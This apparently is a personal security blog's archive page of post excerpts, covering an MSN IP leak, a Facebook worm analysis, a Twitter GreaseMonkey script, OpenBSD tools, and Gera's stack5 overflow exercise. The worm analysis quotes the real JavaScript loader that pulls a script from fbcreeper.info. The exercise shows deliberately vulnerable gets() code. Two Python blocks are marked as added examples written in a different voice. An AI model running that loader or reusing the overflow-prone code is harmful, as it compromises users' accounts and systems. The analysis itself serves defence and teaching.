It’s common knowledge that Microsoft Windows Live Messenger is one of the most insecure instant messengers out there, since its communication protocol doesn’t use any kind of encryption.
Today, while I was working on my pet honeypot project, I found out that it also leaks users’ public IP addresses when they exchange links during their conversations.
While I was browsing my Twitter timeline today, I saw a tweet by VUPEN security about a possible compromise of PHP.net server(s) and a potential PHP source backdoor.
We are aware of a possible compromise of PHP.NET server(s) and a potential PHP source backdoor. “wiki.php.net” was taken offline
–VUPEN Security
Before I continue, I want to make clear that I don’t have any information regarding the compromise, nor can I state that PHP source code was or wasn’t backdoored, since I have not inspected the code, nor have I reviewed the revision log and the changes committed to the PHP source tree. This information is publicly available at http://svn.php.net.
On February the 4th I had a small presentation at Thessaloniki Tech Talk Sessions, on hijacking web sessions and injecting code at the lower layers of a local area network. Here you can find the slides and a little paper I wrote on the topic:
While I was browsing today my timeline, I noticed some re-tweets of people who had annoyingly blinky avatars. I guess Twitter missed the old days, when browsing the web could give you an epileptic seizure. Since people tend to get excited with stupid ideas, I took the time to write a little GreaseMonkey script for Twitter, which substitutes GIF avatars with the Twitter’s default avatar (an egg or something). So now when the blinky pink “Hello, Kitty” apocalypse comes, I’ll be prepared.
/*
A little GreaseMonkey script for Twitter, which replaces GIF avatars
with the Twitter's default avatar in your timeline.
Karagasidis Dimitris, http://gatoni.gr
*/
// ==UserScript==
// @name         Twitter GIF Avatar Blocker
// @namespace    http://gatoni.gr
// @description  A script which substitutes GIF avatars with the Twitter's default avatar
// @include      http://twitter.com/*
// ==/UserScript==
function eliminate_gifs() {
    var avatars = document.getElementsByTagName("img");
    // Index loop: for...in over an HTMLCollection also yields "length" and method names
    for (var i = 0; i < avatars.length; i++) {
        var img = avatars[i];
        // Check if the image is an avatar in the timeline
        if (img.className == "user-profile-link" || img.className == "photo fn") {
            // Strip any query string before looking at the file extension
            var path = img.src.split("?")[0];
            // Substitute the animated avatar with Twitter's default avatar
            if (path.substr(-3).toLowerCase() == "gif") {
                img.src = "http://a1.twimg.com/sticky/default_profile_images/default_profile_0_normal.png";
            }
        }
    }
}
eliminate_gifs();
// Re-run periodically, since the timeline loads new tweets without a page reload
setInterval(eliminate_gifs, 3000);
Spent the day de-obfuscating and analyzing the code of some malware I found on the wall of one of my contacts. It took me quite a few hours, since I de-obfuscated the code manually in a text editor. At least now I can build a decent code obfuscator on my own. :p
You can read the de-obfuscated and fully documented code here.
These are the URLs distributing the malware:
http://fbcreeper.info/
http://procreeper.info/
http://profilechecker.info/
http://thefbcreeper.info/
This is what this malware does:
Posts links on victim’s wall, which advertise the malware
Posts links to victim’s contacts’ walls, which advertise the malware
Posts links to pages created or administered by victim, which advertise the malware
Adds users with emails lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com as administrators to the pages created by the victim.
Sends private messages, advertising the malware
“Likes” pages “DJ-Emphatic” and “OH Whutt” with victim’s account
Invites all contacts to an event (which seems to be removed now)
Sends the user to http://fbviews.org/result.php, where the user is asked to do some “anti-spam verification tests” before he can view the results. Of course there are no results, and the malware developers earn money from bringing traffic to the sites mentioned there.
As of now (22nd February 2011, 23:40 GMT+2), somewhere between 11,000 and 20,000 accounts are infected.
The malware is injected through a JavaScript code snippet:
javascript: (a = (d = document).createElement("script")).src = "http://fbcreeper.info/StalkerTools.fb";void(d.body.appendChild(a))
Do NOT inject and execute unknown code in your browser address bar. If you happened to use this application/malware, check your pages’ administrators, log-out from your Facebook account, clear browsing history and remove any links left on your wall and your pages.
Going through some lazy days, not working on anything in particular. Waiting for my exam period to end. Spent the day jamming on my guitar, and decided to record some parts of it. So this is the result.
A few days ago, I registered a free domain name from the No-IP™ Dynamic DNS provider. My router has an embedded dynamic DNS client, but for some reason it didn’t properly update the No-IP™ servers each time it got disconnected, so I had to do it manually. Also it’s not configurable, so I couldn’t set various parameters such as the update interval.
I decided to set up ddclient on one of my boxes to solve this problem. I installed it, but I really didn’t feel like reading the whole ddclient.conf file in order to configure it, so I decided to write my own client. It’s not rocket science: you just make requests to the No-IP™ update servers with your credentials, your current IP and the domain name you want to associate with it.
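The request described above, as an added example in Python; this is not the author's client. The endpoint (dynupdate.no-ip.com/nic/update), the DynDNS-style result codes and the User-Agent value are assumptions taken from the DynDNS-compatible protocol No-IP documents and should be checked against the provider's current docs. The parts a home-grown client usually gets wrong are the security-relevant ones: the credentials must go in an Authorization header over HTTPS rather than in the URL, the IP must be validated before it is placed in the query string, the client must not resend an unchanged address (providers treat that as abuse), and it must stop on "badauth"/"abuse" instead of retrying until the account is blocked.

```python
"""Minimal No-IP style dynamic DNS updater (added example, not the author's client)."""
import base64
import ipaddress
import re
import urllib.request
from typing import Optional, Tuple

# Assumption: the DynDNS-compatible update endpoint that No-IP documents.
UPDATE_URL = "https://dynupdate.no-ip.com/nic/update"
# Providers ask clients to identify themselves; this value is a placeholder.
USER_AGENT = "example-ddns-client/0.1 ops@example.invalid"

HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)

# DynDNS-style result codes (assumed to be what No-IP returns). The flag says whether
# the client may keep polling afterwards: retrying on "badauth" or "abuse" gets the
# account blocked, so those must stop the update loop.
RESULT_CODES = {
    "good": ("updated", True),
    "nochg": ("unchanged", True),
    "911": ("retry-later", True),
    "nohost": ("fatal", False),
    "badauth": ("fatal", False),
    "badagent": ("fatal", False),
    "!donator": ("fatal", False),
    "abuse": ("fatal", False),
}


def build_request(hostname: str, ip: str, username: str, password: str) -> urllib.request.Request:
    """Validate the inputs and build the update request.

    Credentials go in a Basic auth header over HTTPS, not in the URL where proxy and
    server logs would keep them, and the address is parsed with ipaddress before it
    is placed in the query string so nothing but an IP literal reaches the provider.
    """
    if not HOSTNAME_RE.match(hostname.lower()):
        raise ValueError("invalid hostname: %r" % hostname)
    ip = str(ipaddress.ip_address(ip))  # ValueError on anything that is not an address
    url = "%s?hostname=%s&myip=%s" % (UPDATE_URL, hostname, ip)
    token = base64.b64encode(("%s:%s" % (username, password)).encode()).decode()
    return urllib.request.Request(
        url, headers={"Authorization": "Basic " + token, "User-Agent": USER_AGENT}
    )


def parse_response(body: str) -> Tuple[str, Optional[str], bool]:
    """Map the provider's one-line reply to (status, ip, may_retry)."""
    parts = body.strip().split()
    if not parts:
        return ("unknown", None, False)
    status, may_retry = RESULT_CODES.get(parts[0], ("unknown", False))
    ip = parts[1] if len(parts) > 1 and status in ("updated", "unchanged") else None
    return (status, ip, may_retry)


def should_update(last_ip: Optional[str], current_ip: str) -> bool:
    """Contact the provider only when the address changed; repeated no-change updates count as abuse."""
    return last_ip != current_ip


def update_once(hostname, ip, username, password, last_ip=None, timeout=10):
    """One update cycle; returns the parsed reply, or None when no request was needed."""
    if not should_update(last_ip, ip):
        return None
    req = build_request(hostname, ip, username, password)
    # Network call; the offline checks above cover everything up to this point.
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_response(resp.read().decode("ascii", "replace"))
```

A cron job or a loop around update_once only needs to persist the last IP it sent and to exit for good when may_retry comes back False.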
[Update #1/Time Saver: As DbD pointed out in his comment, you can search for package names using pkg_info or the pkg front-end to package management tools.]
As I mentioned in one of my previous posts, I installed OpenBSD, so I’m spending these days configuring it according to my needs.
One of the things that annoyed me is that OpenBSD’s default package management system doesn’t have a utility for searching packages. Every time I was about to install a package, I had to search the web or look for it in my preferred mirror’s directory listing. So I decided to write a utility for that, since I like writing my own shit and it was something trivial to do.
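The search over a mirror's directory listing described above, as an added example in Python rather than the author's utility. It goes one step further than a plain search: a package pulled from a mirror by hand should be checked against the SHA256 list that the packages directory carries (the file pkg_add reads, itself signed as SHA256.sig), because a search tool that fetches and installs whatever name it finds is exactly the kind of convenience an altered mirror exploits. The listing text is constructed for the example; the version-splitting rule (the version starts at the first "-" followed by a digit) follows the OpenBSD package naming convention.

```python
"""Search an OpenBSD mirror's package listing and verify a downloaded package against the
mirror's SHA256 list (added example, not the author's tool)."""
import hashlib
import hmac
import re
from typing import Dict, List, Tuple

# A directory listing or index.txt names packages as "<name>-<version>[-<flavor>].tgz".
PKG_FILE_RE = re.compile(r"(\S+)\.tgz\s*$")
VERSION_RE = re.compile(r"^(.+?)-(\d.*)$")
SHA_LINE_RE = re.compile(r"^SHA256 \((.+)\) = ([0-9a-f]{64})\s*$")

# Constructed sample of an "ls -l" style mirror listing; not real mirror data.
SAMPLE_INDEX = """\
-rw-r--r--  1 1000  1000   1234567 Jan 10 12:00 vim-8.2.2000-no_x11.tgz
-rw-r--r--  1 1000  1000    345678 Jan 10 12:00 py3-requests-2.25.1.tgz
-rw-r--r--  1 1000  1000       567 Jan 10 12:00 ddclient-3.9.1.tgz
-rw-r--r--  1 1000  1000       567 Jan 10 12:00 SHA256
"""


def list_packages(index_text: str) -> List[str]:
    """Return the package names (without .tgz) found in a listing, whatever the other columns are."""
    names = set()
    for line in index_text.splitlines():
        m = PKG_FILE_RE.search(line)
        if m:
            names.add(m.group(1))
    return sorted(names)


def split_version(pkgname: str) -> Tuple[str, str]:
    """Split "py3-requests-2.25.1" into ("py3-requests", "2.25.1"); flavors stay with the version."""
    m = VERSION_RE.match(pkgname)
    return (m.group(1), m.group(2)) if m else (pkgname, "")


def search_packages(index_text: str, pattern: str, exact: bool = False) -> List[str]:
    """Case-insensitive regex search over package names. With exact=True the pattern must
    equal the unversioned name, which is what you want once you know the name and only
    need to see which versions the mirror offers."""
    rx = re.compile(pattern, re.IGNORECASE)
    out = []
    for name in list_packages(index_text):
        stem, _ = split_version(name)
        if (exact and stem.lower() == pattern.lower()) or (not exact and rx.search(name)):
            out.append(name)
    return out


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_sha256_file(text: str) -> Dict[str, str]:
    """Parse the mirror's SHA256 file: one "SHA256 (file) = hex" line per package."""
    digests = {}
    for line in text.splitlines():
        m = SHA_LINE_RE.match(line)
        if m:
            digests[m.group(1)] = m.group(2)
    return digests


def verify_package_bytes(filename: str, data: bytes, sha256_text: str) -> bool:
    """Fail closed: a package missing from the list, or with a different digest, is rejected.
    Verify SHA256.sig with signify first; an unsigned digest list from the same mirror that
    served the package proves nothing on its own."""
    expected = parse_sha256_file(sha256_text).get(filename)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_hex(data), expected)
```

On a live mirror the listing and the SHA256 file come from the same package directory, so a wrapper that downloads both, runs search_packages, and refuses to hand a file to pkg_add unless verify_package_bytes returns True is the whole tool.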
So today I decided to install OpenBSD on one of my boxes. It’s been years since the last time I messed with this OS. I intended to use it as a local server and move there most of the services I have distributed on other (virtual and not) machines.
Since I spend most of my time in GNU/Linux terminals, I found the OpenBSD terminal pretty annoying: specifically, the fact that some keys (HOME, END, PAGE UP etc) for some fucking reason don’t work. I tried to find a workaround by changing terminal types, but the problem persisted. I read somewhere that in graphical terminals this problem does not occur, so I installed Xorg and XFCE, just in case I need to do some longer-than-usual administration tasks which require lots of typing. And indeed, in the graphical environment everything worked smoothly…
…Until a few minutes later, when I realized that there were some rendering problems. It was like the surface wasn’t redrawn properly. When I clicked on icons or opened windows, my desktop was full of glitches, which were annoying as hell. I have an old ATI Radeon 7500 on that box, by the way.
I noticed that there was a shitload of options for radeon-based cards commented out in my xorg.conf, so I started reading the manual for ATI Radeon video driver which comes with OpenBSD, to find out what they were all about.
The last snippet of code in Gera’s “Warming Up on Stack” series that we have to exploit is this:
#include <stdio.h>

/* stack5.c *
 * specially crafted to feed your brain by gera */
int main() {
    int cookie;
    char buf[80];

    /* Prints the addresses of buf and cookie (written for a 32-bit build) */
    printf("buf: %08x cookie: %08x\n", &buf, &cookie);
    /* gets() has no bounds check: input longer than 80 bytes runs past buf */
    gets(buf);
    if (cookie == 0x000a0d00)
        printf("you lose!\n");
}
Our task is to make this piece of code print “you win!” to the standard output.
Spoiler Alert: If you want to solve this exercise on your own, you should stop reading here.